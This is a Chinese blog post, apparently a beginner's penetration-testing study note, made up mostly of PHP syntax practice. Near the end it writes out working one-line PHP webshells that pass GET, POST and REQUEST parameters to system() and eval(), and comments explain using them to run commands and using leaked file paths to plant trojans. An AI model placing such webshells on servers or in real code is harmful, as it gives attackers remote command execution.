渗透测试入门学习——php基础语法练习

已于 2024-09-17 11:04:16 修改
阅读量185 收藏
点赞数 3
文章标签: 学习 php web安全 网络安全 系统安全
于 2024-09-14 23:28:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44611153/article/details/142267933
版权
最终效果(部分):

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>我的第一个php页面</title>
</head>
<body>

<h1>我的第一个php页面</h1>
<hr>

<?php
    echo "你好";
?>

<?php
    // echo "你好"; 单行注释
    /*
    echo "你好"; 多行注释
    */
    echo "Hello World!";
?>

<hr>
<!-- <p>这是html单行注释</p> -->
<?php
    echo "计算7+8的结果是";
    $x = 7;
    $y = 8;
    $z = $x + $y;
    echo $z;
?>

<hr>
<?php 
    echo "这是一个字符串变量";
    $text = "nihaoshijie";
    echo $text,'<br>';
    echo "长度是", strlen($text),'<br>';
    echo "查找字符串,返回位数从0开始,为", strpos("Hello world!121455556664782","555");
?>

<?php
    //移除变量
    unset($text);
    unset($x);
    unset($y);
    unset($z);
?>

<hr>
<?php
    //嵌套获取变量值
    $a = "b";
    $b = 2;
    echo $$a;
?>

<hr>
<?php
    //变量间引用传值
    $a = 999;
    $b = &$a;//取a的地址赋值给b,执行后a与b指向同一个内存区域
    $b = 888;
    echo $a,$b;
?>

<hr>
<?php
    //单双引号区别,双引号会经过解析,单引号会直接输出
    echo "a变量是$a",'<br>';
    echo 'a变量是$a';
    unset($a);
    unset($b);
?>

<hr>
<?php
    //定义php常量
    define('PI',3.14);
    const PII = 3.1415926;
    //定义特殊常量
    define('-_-','smile');
    //const -_- = 'smile'错误
?>

<?php
    //使用常量
    echo PI;
    //特殊常量的使用
    echo constant('-_-');
    //echo -_-;错误
?>

<hr>
<?php
    //系统常量
    echo PHP_VERSION;
    echo '<br>';
    echo PHP_INT_SIZE;
    echo '<br>';
    echo PHP_INT_MAX;
?>

<hr>
<?php
    //魔术常量,可用于信息收集,看路径特点,有无盘符区分服务器windos和linux系统,有针对进行攻击
    //windox文件名不区分大小写,linux严格区分大小写
    //FILE发现绝对路径可以配合其他手法写入木马
    echo __FILE__;
    echo '<br>';
    echo __LINE__;
    echo '<br>';
    echo __LINE__;
?>

<hr>
<?php
    $lll = 99;
    //超全局变量
    echo $GLOBALS["lll"];
?>

<hr>
<?php
    //几个重要的服务器信息变量
    echo $_SERVER["PHP_SELF"],'<br>';
    echo $_SERVER["SERVER_NAME"],'<br>';
    echo $_SERVER["HTTP_HOST"],'<br>';
    echo $_SERVER["HTTP_REFERER"],'<br>'; //从那里跳转
    echo $_SERVER["HTTP_USER_AGENT"],'<br>'; //浏览器信息
    echo $_SERVER["SCRIPT_NAME"],'<br>';
    echo '<br>';
    //遍历输出
    foreach($_SERVER as $x => $x_value){
        echo $x," : ",$x_value,'<br>';
    }
?>
<hr>

<?php
    //各种运算符和书写与C++很相近,不做过多练习
    $x = 10;
    $y = 6;
    echo "变量x是$x 变量y是$y",'<br>';
    $z = $x % $y;
    echo "x % y = $z",'<br>';
    unset($z);
    $z = $x * $y;
    echo "x * y = $z";
    unset($z);
?>

<hr>
<?php
    //关闭警告提醒
    error_reporting(0);
    //关闭警告提醒的另一种方法,用@()套住语句
    //数据类型转换,布尔型和C++一样,true为1,flase为0
    //php语言字符串转换有自己的规则,以字母为开头的永远为0,以数字为开头的取到字符串为止(到第二个小数点截止)
    $a = 'abcd1234.1.1';
    $b = '1234.1.1abcd';
    echo "变量a是$a,变量b是$b",'<br>';

    //自动转换
    echo "a + b = ",$a + $b,'<br>';
    echo "PS:进行算数+运算前先自动转换成数值类型再计算,会产生包含非数字字符的警告提醒",'<br>';

    //强制转换
    echo "a转换为float值为:",(float)$a,'<br>',"b转换为float值为:",(float)$b,'<br>';
?>

<hr>
<?php
    //判断数据类型,布尔型数据不能直接echo输出,要用var_dump输出
    var_dump(is_int($a));
    var_dump(is_string($b));
    unset($a);
    unset($b);
?>

<hr>
<?php
    //比较运算符同样和C++十分相似着重记忆===和==的区别
    //===是强等于,不仅数值相等类型也要相同
    //==是弱等于,只需数值相同即可,php是弱类型语言
    $x = 10;
    $y = 10.0;
    $z = 5;
    $a = "5";
    echo "x(整型):$x y(浮点型):$y z(整形):$z a(字符型):$a",'<br>';
    echo "x == y的结果为:";
    var_dump($x == $y);
    echo '<br>',"z == a的结果为:";
    var_dump($a == $z);
    echo '<br>',"x === y的结果为:";
    var_dump($x === $y);
    echo '<br>',"z === a的结果为:";
    var_dump($a === $z);
?>

<hr>
<?php
    //逻辑运算符和C++相似,也有短路特性
    var_dump($a > 5 && $z++);
    echo $z,'<br>';
    var_dump(!($x > 10) || $z++);
    echo $z;
    unset($a);
    unset($z);
    unset($x);
    unset($y);
?>

<hr>
<?php
    //连接运算符
    $a = 'World';
    $b = 666;
    $x = $a . $b;
    echo $x,'<br>';
    $y = 'Hello';
    $y .= $x;
    echo $y;
    unset($a);
    unset($b);
    unset($x);
    unset($y);
?>

<hr>
<?php
    //三目运算和C++也相似
    $a = 10;
    $b = $a >= 10 ? 100 : 0;
    echo $b;
?>

<hr>
<?php
    //自操作运算符和C++类似
    $a = 0;
    $b = 1;
    echo "自操作执行前:","a:$a b:$b",'<br>';
    echo "执行自操作:",$a++,++$b,'<br>';
    echo "自操作执行后:",$a,$b;
?>

<hr>
<?php
    //位运算符也和C++类似
    $a = 11;
    $b = 11111;
    echo $a & $b,'<br>';
    echo $a | $b,'<br>';
    echo $a ^ $b,'<br>';
    echo ~ $a,'<br>';
    echo $a<<3,'<br>';
    echo $a>>1,'<br>';
?>

<hr>
<?php
    //if else分支结构,同样和C++神似
    $a = 6;
    if($a >= 1 && $a <= 5){
        echo "今天上班";
    }
    elseif($a == 6 || $a == 7){
        echo "今天不上班";
    }
    else{
        echo "您输入的日期有误";
    }
?>

<hr>
<?php
    //switch分支结构
    $a = 6;
    switch ($a) {
        case '1':
            echo "今天周一";
            break;
        case '2':
            echo "今天周二";
            break;
        case '3':
            echo "今天周三";
            break;
        case '4':
            echo "今天周四";
            break;
        case '5':
            echo "今天周五";
            break;
        case '6':
            echo "今天周六";
            break;
        case '7':
            echo "今天周日";
            break;
        default:
            echo "输入错误";
            break;
    }
?>

<hr>
<?php
    //for循环结构
    for($i = 1; $i <= 5; $i++){
        echo "这是用for循环生成的第$i",'条数据<br>';
    }
?>

<hr>
<?php
    //while循环结构
    while($i > 0){
        $i--;
        echo "这是while循环,现在i是$i",'<br>';
    }
?>

<hr>
<?php
    //do-while循环结构
    do{
        $i++;
        echo "这是do里的语句,现在i是$i",'<br>';
    }
    while($i < 5);
?>

<hr>
<?php
    //函数写法
    function sum($x, $y){
        return $x + $y;
    }
    echo sum(8, 9);
?>

<hr>
<?php
    //数组用法
    echo "数组练习",'<br>';
    //定义数组
    $cars = array("Volvo","BMW","Toyota");
    //或者
    $cars_2[0] = "111";
    $cars_2[1] = "222";
    $cars_2[3] = "333";
    echo "直接输出:",$cars,'<br>';
    echo "输出第0个:",$cars[0],'<br>';
    echo "输出全部:",var_dump($cars),'<br>';
    echo "输出数组长度:",count($cars),'<br>';
    //遍历输出
    for($i = 0; $i < count($cars); $i++){
        echo $cars[$i],'<br>';
    }
?>

<hr>
<?php
    //关联数组
    echo "关联数组练习",'<br>';
    //定义数组
    $id = array("Peter"=>"101","Ben"=>"102","Joe"=>"103");
    //或者
    $id_2["Peter"] = "111";
    $id_2["Ben"] = "222";
    //输出
    echo $id_2["Peter"],'<br>';
    echo var_dump($id_2),'<br>';
    //遍历输出关联数组
    foreach($id as $x => $x_value){
        echo $x,'_',$x_value,'<br>';
    }
?>

<hr>
<?php
    //数组排序
    //升序排序,降序用rsort()
    $nums = array(1,5,48,5,42,36,5,22,43);
    for($i = 0; $i < count($nums); $i++){
        echo $nums[$i],',';
    }
    sort($nums);
    echo '<br>';
    for($i = 0; $i < count($nums); $i++){
        echo $nums[$i],',';
    }
    //关联数组排序
    //asort()根据值排序,降序为arsort()
    //ksort()根据键排序,降序为krsort()
    arsort($id);
    echo '<br>';
    foreach($id as $x => $x_value){
        echo $x,'_',$x_value,'<br>';
    }
?>

<hr>
<?php
    //可变函数
    function display(){
    //FUNCTION魔术常量可用来辅助进行黑盒测试
        echo __LINE__, '<br>', __FUNCTION__;
    }
    $func = 'display';
    $func();
    echo '<br>';
    //和C++类比可以自定义一些规则,比如C++中sort()可以自定义排序规则
    function sys_function($a, $b){
        //相当于user_function(10)
        return $a($b);
    }
    function user_function($x){
        return $x * $x * $x;
    }
    echo sys_function('user_function', 10);
    //匿名函数
    $hao = function(){
        echo '<br>',"你好";
    };
    $hao();
?>

<hr>
<?php
    //常见函数,两个涉及安全的函数eval()和system()
    $a = "123+";
    $b = "456";
    echo eval("return $a$b;"),'<br>';
    system("ipconfig");
?>

<hr>
<?php
    //后门木马
    //用get方式执行system(),URL后接?aaa=dir即可查看出系统目录whoami查看权限
    system($_GET['aaa']);
    //经典一句话木马
    eval($_GET['bbb']);
    eval($_POST['ccc']);
    //万用接受一句话木马
    eval($_REQUEST['ddd']);
?>

<hr>
<?php
    //class用法
    class test {
        function _print() {
            echo "class name is ", __CLASS__, '<br>';
            echo "function name is ", __FUNCTION__, '<br>';
        }
    }
    $t = new test();
    $t -> _print();
?>
</body>
</html>

Dovir多多
关注
Web安全防攻(渗透测试
m0_62959521的博客
04-07 3252
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程序中会有5...
渗透测试实战指南笔记
weixin_67830340的博客
04-07 2016
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程序中会有5个选项,如下
渗透测试入门教程(非常详细),从零基础入门到精通,看完这一篇就够了_渗透测试教程
shanguicsdn000的博客
08-22 1111
渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。一定要注意的是,在进行渗透测试前,需要获得目标客户的授权,如果未获得授权,千万不要对目标系统进行渗透测试,后果请查看《网络安全法》。同时要有良好的职业操守,不能干一些违法的事情。网络安全产业就像一个江湖,各色人等聚集。
[GO语言基础] 一.为什么我要学习Golang以及GO语言入门普及
热门推荐
杨秀璋的专栏
12-14 11万+
作为网络安全初学者,会遇到采用Go语言开发的恶意样本。因此从今天开始从零讲解Golang编程语言,一方面是督促自己不断前行且学习新知识;另一方面是分享与读者,希望大家一起进步。这系列文章入门部分将参考“尚硅谷”韩顺平老师的视频和书籍《GO高级编程》,详见参考文献,并结合作者多年的编程经验进行学习和丰富,且看且珍惜吧!后续会结合网络安全进行GO语言实战深入,驾驭~ 这些年我学过各种编程语言,从最早的C语言到C++,再到C#、PHP、JAVA,再到IOS开发、Python,到最新的GO语言,学得是真的杂。有时
web 漏洞入门之 —— SQL 注入教程
实验楼
07-14 6243
SQL 注入是最常见、最被人们熟知的 web 漏洞。根据百科的解释:所谓SQL注入,就是通过把SQL命令,插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的...
Web安全攻防 渗透测试实战指南3
jxy191021的博客
04-05 6309
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程序中会有5个选项,如下
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8090
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
零基础如何学习挖漏洞(技巧篇)
HUANGXIN9898的博客
05-27 1507
这时候就是要靠我们万能的 fofa 了,首先我们要知道有哪些 cms 有漏洞。
python学习001(语法基础篇)
weixin_44642263的博客
08-04 703
前言: 1、运维/网络为什么要学习编程? (1)运维/网络中所有已学的命令其实都是已经编制好的程序,创造命令就是编写程序; (2)在云计算领域中,繁琐的命令配置已经不能满足日常需求,深入发展是需要贴近业务/研发的,因此就要能够创造命令/编写程序/开发; (3)网络安全领域中,可以深入理解渗透、攻防等细节,Kali-Linux ,SDN(命令对应网络)夯实技术; (4)对于校招而言,大型互联网公司(一般指软件方面——阿里腾讯百度字节跳动)笔试题必考编程题{厂商提供设备服务(如深信服,华为,华3),.
MySQL数据库的详细学习步骤
2401_87352036的博客
10-11 1247
MySQL数据库的详细学习步骤可以归纳为以下几个阶段,每个阶段都包含了特定的学习内容和目标。
【人工智能学习之PaddleOCR快速上手】
Jiagym的博客
10-12 1289
在配置文件中,可以设置组建模型、优化器、损失函数、模型前后处理的参数,PaddleOCR从配置文件中读取到这些参数,进而组建出完整的训练流程,完成模型训练,在需要对模型进行优化的时,可以通过修改配置文件中的参数完成配置,使用简单且方便修改。而 L2 正则化中,添加正则化项的目的在于减少参数平方的总和。准确检测的标准是检测框与标注框的IOU大于某个阈值,正确识别的检测框中的文本与标注的文本相同。如果缺少带标注的数据,或者不想投入研发成本,建议直接调用开放的API,开放的API覆盖了目前比较常见的一些垂类。
正点原子学习笔记之汇编LED驱动实验
q1594的博客
10-10 757
为什么要写汇编需要用汇编初始化一些SOC外设使用汇编初始化DDR、I.MX6U不需要设置sp指针,一般指向DDR,设置好C语言运行环境。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
10-15 1092
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
论文及其创新点学习cvpr2022 On the Integration of Self-Attention and Convolution
qq_53536373的博客
10-13 463
论文创新点,将注意力机制 和卷积 相结合。
stm32单片机个人学习笔记9(TIM输入捕获)
2302_80867398的博客
10-13 245
从模式选择Reset模式可以实现自动清零计数器CNT。
苍穹外卖学习笔记(二十一)
₍˄·͈༝·͈˄*₎◞ ̑̑的博客
10-13 347
取消订单与再来一单
Linux内核与基础命令学习总结
helloworld工程师的博客
10-12 978
Linux操作系统Linux操作系统博大精深,其中对线程,IO,文件系统等概念的实现都很有借鉴意义。more​。
小新学习Docker之Docker--harbor私有仓库部署与管理
最新发布
pangdongqiqi的博客
10-16 802
Harbor 是 VMware 公司开源的企业级 Docker Registry 项目,其目标是帮助用户迅速搭建一个企业级的 Docker Registry 服务。Harbor以 Docker 公司开源的 Registry 为基础,提供了图形管理 UI 、基于角色的访问控制(Role Based AccessControl) 、AD/LDAP 集成、以及审计日志(Auditlogging) 等企业用户需求的功能,同时还原生支持中文。
拆解学习【无线充,EMMC,锂电池电量计,OTA】(二)
zjb6668的博客
10-12 1046
MT5727H内置ARM M0处理器,搭配8KB SRAM和16KB MTP存储器,支持私有无线充电协议,芯片内部集成同步整流器和LDO,芯片内置过压过流保护,支持I2C接口和可配置的GPIO接口。无线连接采用dialog DA16200 WiFi SoC芯片,是一款高度集成的超低功耗的WiFi SoC芯片,芯片内置基带处理器,内存,处理器,功放和放大器等。- 在多任务场景(如蓝牙传输、主动降噪和音频播放)下,需要快速存储和读取中间数据,而 eMMC 的**高速接口**能保证系统的实时性。
模拟实战:渗透测试开发篇——红队操作揭秘
"《Red Team Operations – Development PT 1》是一份专注于网络安全渗透测试的文档,主要探讨了红队(Red Team)在组织中的关键角色和操作。红队是一种模拟实际网络安全威胁的专业团队,成员具有深厚的威胁识别与...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值